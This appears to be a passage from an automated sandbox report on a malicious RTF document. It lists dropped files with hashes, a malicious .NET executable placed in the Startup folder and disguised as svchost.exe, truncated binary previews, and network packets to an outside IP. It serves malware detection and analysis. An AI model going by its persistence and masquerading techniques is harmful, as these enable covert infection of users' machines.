                                                  Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\G8WMKAIS4RP0UU7V5CJM.temp
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):8016
                                                  Entropy (8bit):3.5902227033865217
                                                  Encrypted:false
                                                  SSDEEP:96:chQCsMqwqvsqvJCwoGz8hQCsMqwqvsEHyqvJCworMz1YKrXHBZqHZlUVYIu:cy1oGz8ydHnorMz1htZqH1Iu
                                                  MD5:C970E462F29D5DDEDF82DEFB133A0967
                                                  SHA1:648D94B8484ECE2669D7932CD1958D6008157642
                                                  SHA-256:CDDCC4AA8055F80755FF7543F72EA7C4CD26C25653EEEA653CA609A0AEB53B37
                                                  SHA-512:372219D30807E850D34BEB6AD02824C77F57195BF986609D4069EA5F2F6BC7041321E0F6C48162C8E378FB8599390D5CD200372BE443967C4F61EDD8566AA80D
                                                  Malicious:false
                                                  Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KATDANGR9NGCXMK3FXBM.temp
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):8016
                                                  Entropy (8bit):3.5902227033865217
                                                  Encrypted:false
                                                  SSDEEP:96:chQCsMqwqvsqvJCwoGz8hQCsMqwqvsEHyqvJCworMz1YKrXHBZqHZlUVYIu:cy1oGz8ydHnorMz1htZqH1Iu
                                                  MD5:C970E462F29D5DDEDF82DEFB133A0967
                                                  SHA1:648D94B8484ECE2669D7932CD1958D6008157642
                                                  SHA-256:CDDCC4AA8055F80755FF7543F72EA7C4CD26C25653EEEA653CA609A0AEB53B37
                                                  SHA-512:372219D30807E850D34BEB6AD02824C77F57195BF986609D4069EA5F2F6BC7041321E0F6C48162C8E378FB8599390D5CD200372BE443967C4F61EDD8566AA80D
                                                  Malicious:false
                                                  Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KNRKHEKRLNGFHX3WL0DL.temp
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):8016
                                                  Entropy (8bit):3.5902227033865217
                                                  Encrypted:false
                                                  SSDEEP:96:chQCsMqwqvsqvJCwoGz8hQCsMqwqvsEHyqvJCworMz1YKrXHBZqHZlUVYIu:cy1oGz8ydHnorMz1htZqH1Iu
                                                  MD5:C970E462F29D5DDEDF82DEFB133A0967
                                                  SHA1:648D94B8484ECE2669D7932CD1958D6008157642
                                                  SHA-256:CDDCC4AA8055F80755FF7543F72EA7C4CD26C25653EEEA653CA609A0AEB53B37
                                                  SHA-512:372219D30807E850D34BEB6AD02824C77F57195BF986609D4069EA5F2F6BC7041321E0F6C48162C8E378FB8599390D5CD200372BE443967C4F61EDD8566AA80D
                                                  Malicious:false
                                                  Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KWITJSS33AUNENZNHP1F.temp
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):8016
                                                  Entropy (8bit):3.5902227033865217
                                                  Encrypted:false
                                                  SSDEEP:96:chQCsMqwqvsqvJCwoGz8hQCsMqwqvsEHyqvJCworMz1YKrXHBZqHZlUVYIu:cy1oGz8ydHnorMz1htZqH1Iu
                                                  MD5:C970E462F29D5DDEDF82DEFB133A0967
                                                  SHA1:648D94B8484ECE2669D7932CD1958D6008157642
                                                  SHA-256:CDDCC4AA8055F80755FF7543F72EA7C4CD26C25653EEEA653CA609A0AEB53B37
                                                  SHA-512:372219D30807E850D34BEB6AD02824C77F57195BF986609D4069EA5F2F6BC7041321E0F6C48162C8E378FB8599390D5CD200372BE443967C4F61EDD8566AA80D
                                                  Malicious:false
                                                  Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\P6I517PCOBHL4J9OQ9E0.temp
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):8016
                                                  Entropy (8bit):3.5902227033865217
                                                  Encrypted:false
                                                  SSDEEP:96:chQCsMqwqvsqvJCwoGz8hQCsMqwqvsEHyqvJCworMz1YKrXHBZqHZlUVYIu:cy1oGz8ydHnorMz1htZqH1Iu
                                                  MD5:C970E462F29D5DDEDF82DEFB133A0967
                                                  SHA1:648D94B8484ECE2669D7932CD1958D6008157642
                                                  SHA-256:CDDCC4AA8055F80755FF7543F72EA7C4CD26C25653EEEA653CA609A0AEB53B37
                                                  SHA-512:372219D30807E850D34BEB6AD02824C77F57195BF986609D4069EA5F2F6BC7041321E0F6C48162C8E378FB8599390D5CD200372BE443967C4F61EDD8566AA80D
                                                  Malicious:false
                                                  Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VXTSKOASU3HTN9MNZWSX.temp
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):8016
                                                  Entropy (8bit):3.5902227033865217
                                                  Encrypted:false
                                                  SSDEEP:96:chQCsMqwqvsqvJCwoGz8hQCsMqwqvsEHyqvJCworMz1YKrXHBZqHZlUVYIu:cy1oGz8ydHnorMz1htZqH1Iu
                                                  MD5:C970E462F29D5DDEDF82DEFB133A0967
                                                  SHA1:648D94B8484ECE2669D7932CD1958D6008157642
                                                  SHA-256:CDDCC4AA8055F80755FF7543F72EA7C4CD26C25653EEEA653CA609A0AEB53B37
                                                  SHA-512:372219D30807E850D34BEB6AD02824C77F57195BF986609D4069EA5F2F6BC7041321E0F6C48162C8E378FB8599390D5CD200372BE443967C4F61EDD8566AA80D
                                                  Malicious:false
                                                  Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WPSOBZIDEVVPSMUD2QNK.temp
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):8016
                                                  Entropy (8bit):3.5902227033865217
                                                  Encrypted:false
                                                  SSDEEP:96:chQCsMqwqvsqvJCwoGz8hQCsMqwqvsEHyqvJCworMz1YKrXHBZqHZlUVYIu:cy1oGz8ydHnorMz1htZqH1Iu
                                                  MD5:C970E462F29D5DDEDF82DEFB133A0967
                                                  SHA1:648D94B8484ECE2669D7932CD1958D6008157642
                                                  SHA-256:CDDCC4AA8055F80755FF7543F72EA7C4CD26C25653EEEA653CA609A0AEB53B37
                                                  SHA-512:372219D30807E850D34BEB6AD02824C77F57195BF986609D4069EA5F2F6BC7041321E0F6C48162C8E378FB8599390D5CD200372BE443967C4F61EDD8566AA80D
                                                  Malicious:false
                                                  Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WW5Z4WAT6CR6JFY4TKYI.temp
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):8016
                                                  Entropy (8bit):3.5902227033865217
                                                  Encrypted:false
                                                  SSDEEP:96:chQCsMqwqvsqvJCwoGz8hQCsMqwqvsEHyqvJCworMz1YKrXHBZqHZlUVYIu:cy1oGz8ydHnorMz1htZqH1Iu
                                                  MD5:C970E462F29D5DDEDF82DEFB133A0967
                                                  SHA1:648D94B8484ECE2669D7932CD1958D6008157642
                                                  SHA-256:CDDCC4AA8055F80755FF7543F72EA7C4CD26C25653EEEA653CA609A0AEB53B37
                                                  SHA-512:372219D30807E850D34BEB6AD02824C77F57195BF986609D4069EA5F2F6BC7041321E0F6C48162C8E378FB8599390D5CD200372BE443967C4F61EDD8566AA80D
                                                  Malicious:false
                                                  Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YDKB60LKBB2QYZ2W32L3.temp
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):8016
                                                  Entropy (8bit):3.5902227033865217
                                                  Encrypted:false
                                                  SSDEEP:96:chQCsMqwqvsqvJCwoGz8hQCsMqwqvsEHyqvJCworMz1YKrXHBZqHZlUVYIu:cy1oGz8ydHnorMz1htZqH1Iu
                                                  MD5:C970E462F29D5DDEDF82DEFB133A0967
                                                  SHA1:648D94B8484ECE2669D7932CD1958D6008157642
                                                  SHA-256:CDDCC4AA8055F80755FF7543F72EA7C4CD26C25653EEEA653CA609A0AEB53B37
                                                  SHA-512:372219D30807E850D34BEB6AD02824C77F57195BF986609D4069EA5F2F6BC7041321E0F6C48162C8E378FB8599390D5CD200372BE443967C4F61EDD8566AA80D
                                                  Malicious:false
                                                  Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe
                                                  Process:C:\Users\user\AppData\Roaming\CTF loader_es.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):3367424
                                                  Entropy (8bit):2.545995908897728
                                                  Encrypted:false
                                                  SSDEEP:6144:w8e+U7MvlCLjsAhi8QMtmeC2C2gffQSXmVEb2BQsP87Q/GQDRT8haxZICH4qxvtz:
                                                  MD5:D96F52FC8733D2F4A127BDC44D4CEB25
                                                  SHA1:E6A708BA1EC4BB5E0335D111C25A660E8D2E3059
                                                  SHA-256:FBF9AD4434424D18319916F523899A50C21535012A50D531ED30040F0B66970B
                                                  SHA-512:08B7F6176FD7906CA8A655DD3D635E105178FD7E4CF86A1397EB71FA913CB4A9630178E58BB9EB93B759399E138049AE3F6ABD5132AA1D5C574B610222F2AD4B
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: Virustotal, Detection: 41%, Browse
                                                  • Antivirus: Metadefender, Detection: 19%, Browse
                                                  • Antivirus: ReversingLabs, Detection: 45%
                                                  Joe Sandbox View:
                                                  • Filename: PO5421-allignright.doc, Detection: malicious, Browse
                                                  • Filename: lsqtIv1jRK.exe, Detection: malicious, Browse
                                                  • Filename: 04052021paymentscancopy.doc, Detection: malicious, Browse
                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..........."...0..X3..........v3.. ....3...@.. ........................3...........@..................................u3.O.....3.......................3...................................................... ............... ..H............text...4V3.. ...X3................. ..`.rsrc.........3......Z3.............@..@.reloc........3......`3.............@..B.................v3.....H........$...P3.........8$...............................................*".(.....*^..}.....(.......(.....*&.(......*".......*".(#....*Vs....($...t.........*....0................s......o.....*.0..~.............s.....s.....r...po.................o...........,.+...X.....+.........%.. .o.........+I..........o...........,.+)..r.83p(........,.+.....o....(....o.........X.......i2..o.............r.83p.r.83p(...........(..........%.r.83p.%.r.83p.%.r.83p.(...........(....r.83p.r.83p(.
                                                  C:\Users\user\Desktop\~$lignright_companyprofile.doc
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):162
                                                  Entropy (8bit):2.431160061181642
                                                  Encrypted:false
                                                  SSDEEP:3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
                                                  MD5:4A5DFFE330E8BBBF59615CB0C71B87BE
                                                  SHA1:7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
                                                  SHA-256:D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
                                                  SHA-512:3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
                                                  Malicious:false
                                                  Preview: .user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...
                                                  C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe
                                                  Process:C:\Users\user\AppData\Roaming\CTF loader_es.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):3367424
                                                  Entropy (8bit):2.545995908897728
                                                  Encrypted:false
                                                  SSDEEP:6144:w8e+U7MvlCLjsAhi8QMtmeC2C2gffQSXmVEb2BQsP87Q/GQDRT8haxZICH4qxvtz:
                                                  MD5:D96F52FC8733D2F4A127BDC44D4CEB25
                                                  SHA1:E6A708BA1EC4BB5E0335D111C25A660E8D2E3059
                                                  SHA-256:FBF9AD4434424D18319916F523899A50C21535012A50D531ED30040F0B66970B
                                                  SHA-512:08B7F6176FD7906CA8A655DD3D635E105178FD7E4CF86A1397EB71FA913CB4A9630178E58BB9EB93B759399E138049AE3F6ABD5132AA1D5C574B610222F2AD4B
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: Metadefender, Detection: 19%, Browse
                                                  • Antivirus: ReversingLabs, Detection: 45%
                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..........."...0..X3..........v3.. ....3...@.. ........................3...........@..................................u3.O.....3.......................3...................................................... ............... ..H............text...4V3.. ...X3................. ..`.rsrc.........3......Z3.............@..@.reloc........3......`3.............@..B.................v3.....H........$...P3.........8$...............................................*".(.....*^..}.....(.......(.....*&.(......*".......*".(#....*Vs....($...t.........*....0................s......o.....*.0..~.............s.....s.....r...po.................o...........,.+...X.....+.........%.. .o.........+I..........o...........,.+)..r.83p(........,.+.....o....(....o.........X.......i2..o.............r.83p.r.83p(...........(..........%.r.83p.%.r.83p.%.r.83p.(...........(....r.83p.r.83p(.

                                                  Static File Info

                                                  General

                                                  File type:Rich Text Format data, unknown version
                                                  Entropy (8bit):4.113991727574773
                                                  TrID:
                                                  • Rich Text Format (5005/1) 55.56%
                                                  • Rich Text Format (4004/1) 44.44%
                                                  File name:Allignright_companyprofile.doc
                                                  File size:2960089
                                                  MD5:5a0c6dd1f7bbc5272f2ced270e2d4d8a
                                                  SHA1:9f553e08793745277db8a0d3aa82a63b7526a28b
                                                  SHA256:fbc12470553e748b10dd0e1a15c6e28a1e777b626757349e46031f7e0608b8e6
                                                  SHA512:4719421697b111049062271caef40709f72e8b32b96b023af71626e5b6d209434bf0eebffdee844fe15e283fdce42ed93d311876818a123562b42c09efa14e6d
                                                  SSDEEP:24576:bs3sSY8fk9mx1nmyuWKNYEDgjfCHw/AMCTIujdqIcfQTWLgmQxKnZpqsmEuyF2w9:S
                                                  File Content Preview:{\rtf8130{\object90153381 90153381 \'' \objautlink92734161\:\objupdate1977406519774065 \objw6282\objh2274{\*\objdata692470 {{{{{{{{{{{{{{{{{{{{{{{{{{\bin000000000 {\*\objdata692470 } \printim209

                                                  File Icon

                                                  Icon Hash:e4eea2aaa4b4b4a4

                                                  Static RTF Info

                                                  Objects

                                                  IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                                  0000000EBhno
                                                  1000000B0hno

                                                  Network Behavior

                                                  Network Port Distribution

                                                  TCP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  May 4, 2021 20:31:09.644644976 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:09.848016024 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:09.848231077 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:09.848525047 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.051945925 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.101667881 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.101728916 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.101777077 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.101826906 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.101826906 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.101875067 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.101876974 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.101906061 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.101933002 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.101941109 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.101990938 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.101990938 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.102032900 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.102066994 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.102086067 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.102092981 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.102129936 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.102152109 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.102185011 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.105278015 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.134949923 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.135090113 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.305121899 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.305355072 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.305522919 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.305546999 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.305567980 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.305589914 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:10.305599928 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:10.305613041 CEST804916752.218.240.113192.168.2.22
